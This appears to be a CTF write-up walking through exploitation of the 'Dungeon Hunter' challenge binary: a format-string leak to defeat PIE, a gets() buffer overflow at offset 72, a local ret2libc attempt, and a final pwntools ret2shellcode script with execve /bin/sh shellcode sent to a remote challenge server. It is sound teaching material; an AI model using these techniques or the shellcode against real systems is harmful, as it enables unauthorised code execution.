Decode-E-Cyber CTF 2023 — PWN/Binary Exploitation Writeup — 2

11 min readNov 6, 2023

I participated in Decode-E-Cyber CTF 2023 conducted by OWASP VIT Bhopal and we were the Winners! Team Pegasus with 1350 points. We were able to crack many challenges and got first, and I was the only one who solved the PWN / Binary Exploitation Challenges in the event.

This is Part-2 writeup for the Binary Exploitation Challenges.

Challenge 2: Dungeon Hunter

Difficulty: Medium — Hard

The provided the original compiled binary for this challenge. Let’s explore.

Nice! The binary has no stack cookie, and the NX (non-executable stack) is disabled, so we can exploit buffer overflow(if there is one) with shellcode on the stack. But, the PIE (Position Independent Executable) is enabled at compile time. So, the base address base address of the executable will be randomized each time the program starts.

Keep in mind that the base address won’t be 100% random, there will be some identifiable patterns.

Let’s run the executable and explore!

The program accepts user supplied input 2 times. The first input is directly reflected in the output and for the second input, nothing happens.

The binary has PIE, so we might need to leak addresses in order to exploit the binary. As the first input is reflected on the output, there’s a chance for the binary being vulnerable to Format String / Memory Leak vulnerability.

Let’s try that by supplying a format specifier as input to the program.

Yes! the program is vulnerable to Format string vulnerability and it is also vulnerable to Buffer Overflow via the second input.

Note: You can also use any decompiler like Ghidra to decompile the binary and find the vulnerability by looking at the code. Here, I found it manually.

Cool! Now we can use any debugger to analyze the program and the crash to exploit it.

Gdb is our best friend. I am using Pwndbg, an extension to Gdb for exploit-dev.

Use ‘info functions’ to list all the functions inside the binary. Note that there are 2 functions that are defined by the developer of this program, all of the other functions that are displayed are default functions/symbols added by the compiler.

Note: Pwndbg turns ASLR off for the program that’s been loaded, so PIE will not work inside Pwndbg. That means the base address for the binary will always be the same inside Pwndbg.

Let’s analyze the leak and the crash in gdb.

It leaked a value from the binary and crashed at some point. We’ll come to the crash later. Let’s look at what address it leaks.

We can look at the memory map of the process using vmmap command in Pwndbg.

The leaked address is 0x5555555560a7 and the base address(starting offset) of the binary is 0x555555554000. By looking at the pattern of the leaked value, we can confirm that the leaked value is an address inside the binary itself.

We can use Python to calculate the base address of the binary.

It’s just a simple subtraction to identify the correct base address from the leaked value. The base address of the is 8359 (0x20a7) away from the leaked address.

We found the offset but, the addresses will be random outside Pwndbg right? Well yes, but in PIE/ASLR only the base addresses are randomized, in simple words: the content inside the binary/executable will remain at the same place and only the starting address will be changed each time.

So, we can calculate the base address with the leaked address.

Let’s run the program outside gdb to make sure the leaked addresses are randomized each time the program starts as a new process.

Yes, it is randomized each time. Okay, but is it completely random? The answer is no. It’s not 100% random, there’s a noticeable pattern on each leaks.

It always starts with 0x5.. and ends with 0a7, and we already know the offset distance between the leak and the executable’s base address, which is 8359 that is equal to 0x20a7 in hex.

The offset distance will be the same even if the base address is randomized.

Cool! Now let’s analyze the crash in Gdb to find exactly where the program crashes on user input.

The ‘cyclic’ command in Pwndbg can generate long strings with a cyclic pattern that can be used to identify the right offset where the crash happens.

I created a 200 character long string using çyclic to supply as an input to the program.

The return pointer of the program is overwritten with 0x616161616161616a. The return pointer will be on top of the stack, and that’s now overwritten with ‘jaaaaaaa’.

We can use cyclic command to find the exact offset.

The offset is 72. We have control over the return pointer at the offset 72.

Now, we can try to exploit the program!

We got a Memory leak
We got control on return pointer

As we know from the Checksec’s output, the binary has NX disabled so the stack will be executable and we can just place some shellcode on the stack and make the return pointer jump to the shellcode on the stack.

To make it jump to our shellcode, we should know the exact address of the second input (input that holds the shellcode) to point the return pointer to that address to execute our code. But we don’t know the address of our second input, trying to leak it will not work because the leak happens on the first input and the crash happens at second input.

We can try leaking stack addresses and calculating the offsets, but we can’t rely on that, we might face various roadblocks because of Stack Address randomization, Environment variables and other shenanigans.

To Overcome this limitation we can perform other techniques like ROP / Return-to-Libc, to exploit the program.

In order to perform Return to Libc attack, we need to leak Libc addresses and calculate right offsets for libc symbols like system (system function) and “/bin/sh”.

Spoiler: Return-to-libc is not the solution, it only works on local machine and won’t work on the target ctf server. That’s because we cannot rely on our local libc to exploit a remote target. You can skip the Ret2Libc part if you are here for the actual solution. I did ret2libc just for fun and practice.

Ret2Libc Attack:

We need to leak libc addresses to pull this off.

I created a small bash script to leak all the addresses.

FYI, Libc address will always start with 0x7f regardless of randomization. I ran the script with grep 0x7f.

Seems like %37$p leaked some address that looks like from libc.

Let’s check that with Gdb.

Yes, the address leaked is from libc (__libc_start_call_main).

We can use this to calculate the libc base address and other useful addresses and defeat PIE/ASLR.

I used ‘print system’ in gdb to display the exact address of system() function from libc (__libc_system). We use system() function to execute arbitrary commands, by providing “/bin/sh” as an argument to system function will give us the shell.

Let’s calculate the Libc base address, offset for /bin/sh and the system function from the leak that we got.

system function’s offset is +152150 away from the leaked address(__libc_start_call_main) (by %37$p).

We can use strings to find /bin/sh inside libc. The string “/bin/sh” is at offset 0x19604f .

Now we’ll calculate the libc’s base address using the leaked value.

The libc base is at -161482 from the leak. This means that, we can get libc base address by subtracting 161482 from the leaked value(by %37$p).

Now that we calculated all the required addresses, 2 ROP Gadgets to perform the attack.

Return-Oriented-Programming is a technique of re-using assembly instructions / code that’s already present inside the binary to bypass security mitigations like DEP/NX and also to overcome some situations in which we cannot use shellcode. (Note: If you’re not familiar with ROP, i’d recommend you to do a quick google search on the topic)

2 ROP Gadgets needed are:

i. POP RDI; RET

ii. RET

POP RDI pops data from the stack and stores it inside RDI register. Why RDI register? In x86_64 RDI is the register that stores the first argument to any functions that’s about to be called. To get the shell, we need to pass /bin/sh to the system function as first argument.

A RET gadget is needed to overcome stack alignment issues while calling system function, without RET the exploit will not work and the program might crash immediately without executing /bin/sh.

To find ROP gadgets, I am using a tool called ropper.

Now that we have all the ingredients, let’s build a ret2libc exploit. PWNtools is our best friend.

Let’s run the exploit.

Yay! Got the shell on local machine via ret2libc bypassing PIE/ASLR.

But wait! Can we use the same payload to exploit the program on the remote target? Short answer is No! In simple terms, we did all the calculation on our local machine and we do not know any information about the target server other that the original binary, so we can’t rely on libc.

Now what?

We need to find a way to store shellcode on the stack and make the return pointer point to our shellcode.

Ret2Shellcode

We need to examine the program once again to find a way to return to user controlled data / shellcode.

We already know that there are 2 functions in the program Main and dungeon.

Let’s disassemble both functions to find where it recieves the second user input.

Seems like, in the dungeon function gets() function is being called. That might be responsible for the second user input and for the crash as well. FYI, gets() is considered dangerous because of the lack of bounds check.

I set a breakpoint after the gets call to analyze the input.

Now, lets run the program and supply a recognizable string to the second input.

The breakpoint is hit as I expected. If you notice RAX register, it holds the input data. Mostly the user input strings will be stored inside RAX register, but it may vary in some cases (I am not sure).

We doesn’t need to know the exact address of our input, we can just use a ROP gadget / instruction like JMP RAX to jump to our shellcode to get the shell.

We can use ropper again to check if there’s JMP RAX gadget is available inside the binary.

Cool, JMP RAX gadget is available for use.

Let’s write an exploit with all the ingredients and run it. I used a small x64 shellcode from Exploit-DB online. https://www.exploit-db.com/exploits/46907

Cool. The exploit worked very well and spawned a shell on my local machine.

We got all the ingredients. But before writing the remote exploit, we need to check the address leak on the target server.

The address leaked on our local machine had a pattern, but it was different on the remote ctf server. The local executable’s leaked address pattern and the remote server’s leak were not similar.

On my local machine when entering %p, the leaked address always started from 0x5.. and ended with 0a7.

On the remote ctf sever, the leaked address ends with 0c2 everytime.

Using the local executable base address doesn’t work against the target server.

We can notice another thing while calculating the binary base address, the leak address always ends with 0a7 and the offset was at 0x20a7 (8359).

And on the target server, the leak always ends with 0c2. So by applying the logic, the offset on the target server might be 0x20c2. We’ll see..

Let’s write a remote exploit.

from pwn import *

# ret overwrite at 72

proc = remote("134.209.146.48",1338)
proc.sendline(b"%p")
proc.recvuntil(b"et: ")

leak_addr = proc.recv(14)
leak_addr = leak_addr.decode()
leak0 = int(leak_addr, 16)
print(f"Leaked Address of the Binary ==> {hex(leak0)}")

#binary_base = leak0 - 4263
binary_base = leak0 - 0x20c2 # difference in leak and offset, based on similarities in local machine


jmp_rax = p64(binary_base + 0x114f) # ROP Gadget for JMP RAX, to jump to the shellcode
ret = p64(binary_base + 0x101a)

shellcode= b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05" # x64 Execve Shellcode

payload = shellcode 
payload += cyclic(72 - len(shellcode))
payload += jmp_rax                         # Payload: SHELLCODE of lenghth 23 + 49 Junk chars + JMP RAX 

proc.recv()
proc.sendline(payload)
proc.interactive()

Voila! The exploit worked like a charm.

Grab the Flag!

Hope you learned something. Thanks for reading.

Happy Pwning!

Decode-E-Cyber CTF 2023 — PWN/Binary Exploitation Writeup — 2

Ret2Shellcode

Written by Febin